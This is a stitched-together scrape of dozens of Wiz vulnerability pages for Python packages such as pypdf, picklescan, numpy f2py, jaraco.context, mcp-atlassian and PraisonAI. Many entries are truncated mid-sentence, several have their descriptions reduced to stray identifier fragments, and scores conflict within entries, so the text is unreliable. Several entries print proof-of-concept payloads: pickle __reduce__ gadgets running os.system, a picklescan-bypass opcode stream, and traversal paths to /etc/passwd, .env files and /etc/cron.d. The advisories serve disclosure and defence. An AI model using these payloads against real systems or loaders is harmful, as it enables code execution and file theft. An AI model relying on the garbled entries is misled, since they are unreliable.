Exploitation Probabi
Wiz
CVE-2026-24780 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
## CVE-2026-24780: Python vulnerability analysis and mitigation
Identifiers surviving from the description: `disabled`, `BlockInstallationBlock`, `__import__()`
Source : NVD
Score 8.6
Published January 29, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
agpt
Sources
NVD
pip Severity HIGH No Fix Added at: Jan 29, 2026
Wiz
CVE-2026-33744 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
## CVE-2026-33744: Python vulnerability analysis and mitigation
Identifiers surviving from the description: `docker.system_packages`, `bentofile.yaml`, `RUN`, `system_packages`, `bentoml containerize`, `docker build`
Source : NVD
Score 7.8
Published March 27, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
bentoml
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 29, 2026
Wiz
CVE-2026-35526 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
## CVE-2026-35526: Python vulnerability analysis and mitigation
Identifiers surviving from the description: `graphql-transport-ws`, `graphql-ws`, `asyncio.Task`, `Operation`
Source : NVD
Score 7.5
Published April 6, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
strawberry-graphql
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 06, 2026
Wiz
CVE-2026-22779 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
## CVE-2026-22779: Python vulnerability analysis and mitigation
BlackSheep is an asynchronous web framework to build event based web applications with Python. Prior to 2.4.6, the HTTP Client implementation in BlackSheep is vulnerable to CRLF injection. Missing headers validation makes it possible for an attacker to modify the HTTP requests (e.g. insert a new header) or even create a new HTTP request. Exploitation requires developers to pass unsanitized user input directly into headers. The server part is not affected because BlackSheep delegates to an underlying ASGI server handling of response headers. This vulnerability is fixed in 2.4.6.
Source : NVD
Score 6.3
Published January 14, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Python
Has Public Exploit No
Has
Wiz
CVE-2026-22691 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
## CVE-2026-22691: Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to version 6.6.0, pypdf has possible long runtimes for malformed startxref. An attacker who uses this vulnerability can craft a PDF which leads to possibly long runtimes for invalid startxref entries. When rebuilding the cross-reference table, PDF files with lots of whitespace characters become problematic. Only the non-strict reading mode is affected. This issue has been patched in version 6.6.0.
Source : NVD
Score 2.7
Published January 10, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-28351 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2026-28351: Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to version 6.7.4, an attacker who uses this vulnerability can craft a PDF which leads to large memory usage. This requires parsing the content stream using the RunLengthDecode filter. This has been fixed in pypdf 6.7.4. As a workaround, consider applying the changes from PR #3664.
Source : NVD
Score 6.9
Published February 27, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nemo
open-webui
Sources
NVD
Chainguar
Wiz
CVE-2025-62348 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
## CVE-2025-62348: Python vulnerability analysis and mitigation
Salt's junos execution module contained an unsafe YAML decode/load usage. A specially crafted YAML payload processed by the junos module could lead to unintended code execution under the context of the Salt process.
Source : NVD
## 7.3
Score
Published January 30, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
SaltStack
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
salt-ssh
salt-doc
Sources
NVD
Alpine 3.22 Severity HIGH Has Fix Added at: Nov 26, 2025
Alpine 3.23 Severity HIGH Has Fix Added at: Dec 04, 2025
Wiz
CVE-2026-32608 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0 [HIGH]
## CVE-2026-32608: Python vulnerability analysis and mitigation
{{name}}
{{key}}
secure_popen()
subprocess.Popen(shell=False)
Source : NVD
## 7
Score
Published March 18, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Mar 19, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH No Fix Added at: Mar 19, 2026
Wiz
GHSA-r8g5-cgf2-4m4m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2 [CRITICAL]
## GHSA-r8g5-cgf2-4m4m: Python vulnerability analysis and mitigation
## Summary
An unsafe deserialization vulnerability allows an attacker to execute arbitrary code on the host when loading a malicious pickle payload from an untrusted source.
## Details
numpy.f2py.crackfortran
eval
getlincoef
_eval_length
numpy.f2py
## PoC
```python
from numpy.f2py.crackfortran import getlincoef


class EvilClass:
    def __reduce__(self):
        payload = "__import__('os').system('echo \"successful attack\"')"
        return getlincoef, (payload, [])
```
## Impact
picklescan
## Note
picklescan
Source : NVD
## 8.9
Score
Published December 29, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-29039 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8 [HIGH]
## CVE-2026-29039: Python vulnerability analysis and mitigation
changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, the changedetection.io application allows users to specify XPath expressions as content filters via the include_filters field. These XPath expressions are processed using the elementpath library which implements XPath 3.0/3.1 specification. XPath 3.0 includes the unparsed-text() function which can read arbitrary files from the filesystem. The application does not validate or sanitize XPath expressions to block dangerous functions, allowing an attacker to read any file accessible to the application process. This issue has been patched in version 0.54.4.
Source : NVD
## 8.8
Score
Published March 6, 2026
Severity HIGH
Wiz
GHSA-58pv-8j8x-9vj2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## GHSA-58pv-8j8x-9vj2: Python vulnerability analysis and mitigation
## Summary
jaraco.context.tarball()
/
../
dummy_dir/../../etc/passwd
../../etc/passwd
dummy_dir/inner.tar.gz
dummy_dir/../../config/.env
../../config/.env
https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91
strip_first_component
## Details
The flow with setuptools in the mix:
setuptools._vendor.jaraco.context.tarball() > req = urlopen(url) > with tarfile.open(fileobj=req, mode='r|*') as tf: > tf.extractall(path=target_dir, filter=strip_first_component) > strip_first_component (Vulnerable)
## PoC
This was tested on multiple Python versions > 11 on a Debian GNU 12 (bookworm).
You can run this directly after having all the dependencies:
#!/usr/bin/env python3
import t
Wiz
CVE-2026-34726 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.4 [MEDIUM]
## CVE-2026-34726: Python vulnerability analysis and mitigation
Copier is a library and CLI app for rendering project templates. Prior to version 9.14.1, Copier's _subdirectory setting is documented as the subdirectory to use as the template root. However, the current implementation accepts parent-directory traversal such as .. and uses it directly when selecting the template root. As a result, a template can escape its own directory and make Copier render files from the parent directory without --UNSAFE. This issue has been patched in version 9.14.1.
Source : NVD
## 4.4
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 4.4
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
GHSA-46h3-79wf-xr6c Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## GHSA-46h3-79wf-xr6c: Python vulnerability analysis and mitigation
## Summary
Picklescan uses _operator.attrgetter, which is a built-in python library function to execute remote pickle files.
## Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the _operator.attrgetter function in the reduce method.
Then, when the victim, after checking whether the pickle file is safe by using the Picklescan library and finding that this library doesn't detect any dangerous functions, decides to call pickle.load() on this malicious pickle file, it leads to remote code execution.
## PoC
```python
import pickle
import pickletools

opcode3 = b'''cbuiltins
__import__
(Vos
tRp0
0c_operator
attrgetter
(Vsystem
tR(g0
tR(Vecho "pwned by _operator.at
```
Wiz
CVE-2026-22612 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9 [HIGH]
## CVE-2026-22612: Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, Fickling is vulnerable to detection bypass due to "builtins" blindness. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fickling
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 11, 2026
Wiz
CVE-2025-68481 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9 [MEDIUM]
## CVE-2025-68481: Python vulnerability analysis and mitigation
generate_state_token()
state_data
state_secret
/authorize
.../callback?code=&state=
Source : NVD
## 8.8
Score
Published December 19, 2025
Severity HIGH
CNA Score 5.9
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fastapi-users
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Dec 22, 2025
Wiz
GHSA-rrxm-2pvv-m66x Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2 [CRITICAL]
## GHSA-rrxm-2pvv-m66x: Python vulnerability analysis and mitigation
## Summary
numpy.f2py.crackfortran.getlincoef
## Details
numpy.f2py.crackfortran.getlincoef
__reduce__
## PoC
```python
class PoC:
    def __reduce__(self):
        from numpy.f2py.crackfortran import getlincoef
        return getlincoef, ("__import__('os').system('whoami')", None)
```
## Impact
Arbitrary code execution on the victim machine once they load the “scanned as safe” pickle / model file.
Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts.
Enables supply‑chain poisoning of shared model files.
## Credits
ac0d3r
Tong Liu, Institute of Information Engineering, CAS
Source : NVD
## 8.2
Score
Published December 30, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Wiz
CVE-2026-27932 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5 [HIGH]
## CVE-2026-27932: Python vulnerability analysis and mitigation
joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. In 1.6.2 and earlier, a resource exhaustion vulnerability in joserfc allows an unauthenticated attacker to cause a Denial of Service (DoS) via CPU exhaustion. When the library decrypts a JSON Web Encryption (JWE) token using Password-Based Encryption (PBES2) algorithms, it reads the p2c (PBES2 Count) parameter directly from the token's protected header. This parameter defines the number of iterations for the PBKDF2 key derivation function. Because joserfc does not validate or bound this value, an attacker can specify an extremely large iteration count (e.g., 2^31 - 1), forcing the server to expend mass
Wiz
GHSA-5vp3-3cg6-2rq3 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2 [CRITICAL]
## GHSA-5vp3-3cg6-2rq3: Python vulnerability analysis and mitigation
## Summary
to_markdown()
## Details
opens a fenced block with a fixed delimiter of ``````
writes the decoded text directly into the output
## Reproduction
````python
from justhtml import JustHTML

payload = "```\n "
doc = JustHTML(payload, fragment=True)  # default sanitize=True
print(doc.to_html(pretty=False))
# ```
#
print(doc.to_markdown())
# ```
# ```
#
# ```
````
Rendered as CommonMark/GFM-style Markdown, that output is interpreted as:
Line 1 opens a fenced code block
Line 2 closes it
Line 3 is raw HTML outside the fence
Line 4 opens a new fence
## Impact
JustHTML(..., sanitize=True).to_markdown()
## Root Cause
## Fix
Source : NVD
## 7.1
Score
Published March 24, 2026
Severity HIGH
Wiz
CVE-2026-33936 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3 [MEDIUM]
## CVE-2026-33936: Python vulnerability analysis and mitigation
ecdsa
ecdsa.der.remove_octet_string()
SigningKey.from_der()
IndexError: index out of bounds on dimension 1
UnexpectedDER
ValueError
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ecdsa
python-ecdsa
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 29, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fix Added at: Mar 29, 2026
pip Severity MEDIUM Has Fix
Wiz
CVE-2026-30974 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6 [MEDIUM]
## CVE-2026-30974: Python vulnerability analysis and mitigation
Copyparty is a portable file server. Prior to v1.20.11, the nohtml config option, intended to prevent execution of JavaScript in user-uploaded HTML files, did not apply to SVG images. A user with write-permission could upload an SVG containing embedded JavaScript, which would execute in the context of whichever user opens it. This has been fixed in v1.20.11.
Source : NVD
## 5.4
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Python
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
copyparty
Sources
NVD
Wiz
CVE-2026-29778 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1 [HIGH]
## CVE-2026-29778: Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. From version 0.5.0b3.dev13 to 0.5.0b3.dev96, the edit_package() function implements insufficient sanitization for the pack_folder parameter. The current protection relies on a single-pass string replacement of "../", which can be bypassed using crafted recursive traversal sequences. This issue has been patched in version 0.5.0b3.dev97.
Source : NVD
## 6.5
Score
Published March 7, 2026
Severity MEDIUM
CNA Score 7.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Wiz
CVE-2025-68143 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5 [MEDIUM]
## CVE-2025-68143: Python vulnerability analysis and mitigation
Model Context Protocol Servers is a collection of reference implementations for the model context protocol (MCP). In mcp-server-git versions prior to 2025.9.25, the git_init tool accepted arbitrary filesystem paths and created Git repositories without validating the target location. Unlike other tools which required an existing repository, git_init could operate on any directory accessible to the server process, making those directories eligible for subsequent git operations. The tool was removed entirely, as the server is intended to operate on existing repositories only. Users are advised to upgrade to 2025.9.25 or newer to remediate this issue.
Source : NVD
## 6.5
Score
Published December 17, 2025
Severity MEDIUM
Wiz
CVE-2026-28352 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5 [MEDIUM]
## CVE-2026-28352: Python vulnerability analysis and mitigation
Indico is an event management system that uses Flask-Multipass, a multi-backend authentication system for Flask. In versions prior to 3.3.11, the API endpoint used to manage event series is missing an access check, allowing unauthenticated/unauthorized access to this endpoint. The impact of this is limited to getting the metadata (title, category chain, start/end date) for events in an existing series, deleting an existing event series, and modifying an existing event series. This vulnerability does NOT allow unauthorized access to events (beyond the basic metadata mentioned above), nor any kind of tampering with user-visible data in events. Version 3.3.11 fixes the issue. As a workaround, use the webserver to restrict acce
Wiz
CVE-2026-34543 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7 [HIGH]
## CVE-2026-34543: Python vulnerability analysis and mitigation
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From version 3.4.0 to before version 3.4.8, sensitive information from heap memory may be leaked through the decoded pixel data (information disclosure). This occurs under default settings; simply reading a malicious EXR file is sufficient to trigger the issue, without any user interaction. This issue has been patched in version 3.4.8.
Source : NVD
## 8.7
Score
Published April 1, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2025-69207 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4 [MEDIUM]
## CVE-2025-69207: Python vulnerability analysis and mitigation
Khoj is a self-hostable artificial intelligence app. Prior to 2.0.0-beta.23, an IDOR in the Notion OAuth callback allows an attacker to hijack any user's Notion integration by manipulating the state parameter. The callback endpoint accepts any user UUID without verifying the OAuth flow was initiated by that user, allowing attackers to replace victims' Notion configurations with their own, resulting in data poisoning and unauthorized access to the victim's Khoj search index. This attack requires knowing the user's UUID which can be leaked through shared conversations where an AI generated image is present. This vulnerability is fixed in 2.0.0-beta.23.
Source : NVD
## 7.1
Score
Published February 2, 2026
Severity HIGH
Wiz
CVE-2026-0599 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5 [HIGH]
## CVE-2026-0599: Python vulnerability analysis and mitigation
A vulnerability in huggingface/text-generation-inference version 3.3.6 allows unauthenticated remote attackers to exploit unbounded external image fetching during input validation in VLM mode. The issue arises when the router scans inputs for Markdown image links and performs a blocking HTTP GET request, reading the entire response body into memory and cloning it before decoding. This behavior can lead to resource exhaustion, including network bandwidth saturation, memory inflation, and CPU overutilization. The vulnerability is triggered even if the request is later rejected for exceeding token limits. The default deployment configuration, which lacks memory usage limits and authentication, exacerbates the impact, potentiall
Wiz
CVE-2026-4269 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2 [CRITICAL]
## CVE-2026-4269: Python vulnerability analysis and mitigation
A missing S3 ownership verification in the Bedrock AgentCore Starter Toolkit before version v0.1.13 may allow a remote actor to inject code during the build process, leading to code execution in the AgentCore Runtime. This issue only affects users of the Bedrock AgentCore Starter Toolkit before version v0.1.13 who build or have built the Toolkit after September 24, 2025. Any users on a version >=v0.1.13, and any users on previous versions who built the toolkit before September 24, 2025 are not affected.
To remediate this issue, customers should upgrade to version v0.1.13.
Source : NVD
## 5.8
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Python
Has Public Exploit No
Wiz
CVE-2026-23535 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0 [HIGH]
## CVE-2026-23535: Python vulnerability analysis and mitigation
wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.2, the multi-translation download could write to an arbitrary location when instructed by a crafted server. This vulnerability is fixed in 1.17.2.
Source : NVD
## 8
Score
Published January 16, 2026
Severity HIGH
CNA Score 8.0
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wlc
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Jan 18, 2026
Debian 14 Severity HIGH No Fix Added at: Jan 18, 2026
Echo Severity HIGH No Fix
Wiz
CVE-2026-21441 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9 [HIGH]
## CVE-2026-21441: Python vulnerability analysis and mitigation
Content-Encoding
gzip
deflate
br
zstd
preload_content=False
preload_content=False
redirect=False
Source : NVD
## 8.9
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
TensorFlow
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
rhel9/s2i-core
rhel8/go-toolset
Sources
NVD
AlmaLinux 8 Severity HIGH Has Fix Added at: Jan 27, 2026
AlmaLinux 9 Severity HIGH Has Fix Added at: Jan 27, 2026
Alpine 3.20, 3.21, 3.22 Severity HIGH Has Fix Added at: Jan 25, 2026
Alpine 3.23 Severity HIGH Has Fix
Wiz
CVE-2026-25577 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5 [HIGH]
## CVE-2026-25577: Python vulnerability analysis and mitigation
Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in emmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticated attackers to trigger HTTP 500 errors and cause denial of service. This vulnerability is fixed in 1.3.11.
Source : NVD
## 7.5
Score
Published February 10, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
emmett-core
Sources
NVD
Wiz
GHSA-4rh7-jwg9-m28m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2 [CRITICAL]
## GHSA-4rh7-jwg9-m28m: Python vulnerability analysis and mitigation
## Summary
Refresh tokens are accepted as URL query parameters in the keyserver and telemetry server routes.
## Affected Code
```python
# openssl_encrypt_server/modules/keyserver/routes.py:214-215
# openssl_encrypt_server/modules/telemetry/routes.py:90-91
async def refresh_token(
    request: Request,
    refresh_token: str = Query(..., description="Refresh token")
):
```
## Impact
Tokens in URL query parameters are exposed in:
Server access logs
Proxy/CDN logs
Browser history
HTTP Referer headers
Network monitoring tools
This creates significant token leakage risk.
## Recommended Fix
Accept refresh tokens in the request body (POST) instead of query parameters
Body(...)
Query(...)
## Fix
4b2adb0
releases/1.4.x
Wiz
CVE-2026-27614 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3 [CRITICAL]
## CVE-2026-27614: Python vulnerability analysis and mitigation
_pygmentize_lines()
theme/templatetags/issues.py:75-77
mark_safe()
Source : NVD
## 6.1
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
bugsink
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Mar 02, 2026
Wiz
CVE-2026-1213 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3 [MEDIUM]
## CVE-2026-1213: Python vulnerability analysis and mitigation
All versions of askbot before and including 0.12.2 allow an attacker authenticated with normal user permissions to modify the profile picture of other application users. This issue affects askbot: 0.12.2.
Source : NVD
## 5.3
Score
Published January 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
askbot
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 28, 2026
Wiz
CVE-2026-22251 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3 [MEDIUM]
## CVE-2026-22251: Python vulnerability analysis and mitigation
wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, wlc supported providing unscoped API keys in the setting. This practice was discouraged for years, but the code was never removed. This might cause the API key to be leaked to different servers.
Source : NVD
## 5.5
Score
Published January 12, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wlc
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Jan 13, 2026
Echo Severity MEDIUM
Wiz
CVE-2026-34952 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1 [CRITICAL]
## CVE-2026-34952: Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.97, the PraisonAI Gateway server accepts WebSocket connections at /ws and serves agent topology at /info with no authentication. Any network client can connect, enumerate registered agents, and send arbitrary messages to agents and their tool sets. This issue has been patched in version 4.5.97.
Source : NVD
## 9.1
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
praisonai
Sources
NVD
Wiz
CVE-2026-27825 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.0 [CRITICAL]
## CVE-2026-27825: Python vulnerability analysis and mitigation
confluence_download_attachment
download_path
/etc/cron.d/
Source : NVD
## 8
Score
Published March 10, 2026
Severity HIGH
CNA Score 9.0
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mcp-atlassian
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Mar 11, 2026
Wiz
CVE-2025-64712 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8 [CRITICAL]
## CVE-2025-64712: Python vulnerability analysis and mitigation
The unstructured library provides open-source components for ingesting and pre-processing images and text documents, such as PDFs, HTML, Word docs, and many more. Prior to version 0.18.18, a path traversal vulnerability in the partition_msg function allows an attacker to write or overwrite arbitrary files on the filesystem when processing malicious MSG files with attachments. This issue has been patched in version 0.18.18.
Source : NVD
## 9.8
Score
Published February 4, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.6
Wiz
CVE-2026-25732 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5 [HIGH]
## CVE-2026-25732: Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. Prior to 3.7.0, NiceGUI's FileUpload.name property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern UPLOAD_DIR / file.name. Malicious filenames containing ../ sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deployment patterns. This design creates a prevalent security footgun affecting applications following common community patterns. Note: Exploitation requires application code incorporating file.name into filesystem paths without sanitization. Applications using fixed paths, generated filenames, or ex
Wiz
CVE-2026-35492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5 [MEDIUM]
## CVE-2026-35492: Python vulnerability analysis and mitigation
## Impact
PartitionedDataset in kedro-datasets was vulnerable to path traversal. Partition IDs were concatenated directly with the dataset base path without validation. An attacker or malicious input containing .. components in a partition ID could cause files to be written outside the configured dataset directory, potentially overwriting arbitrary files on the filesystem.
Users of PartitionedDataset with any storage backend (local filesystem, S3, GCS, etc.) are affected.
## Patches
posixpath.normpath
DatasetError
## Workarounds
..
## References
Fix: https://github.com/kedro-org/kedro-plugins/pull/1346
Report: https://github.com/kedro-org/kedro/issues/5452
Source : NVD
## 6.5
Score
Published April 6, 2026
Wiz
CVE-2026-24159 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8 [HIGH]
## CVE-2026-24159: Python vulnerability analysis and mitigation
NVIDIA NeMo Framework contains a vulnerability where an attacker may cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure and data tampering.
Source : NVD
## 9.8
Score
Published March 24, 2026
Severity CRITICAL
CNA Score 7.8
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
nemo-toolkit
nemo
Sources
NVD
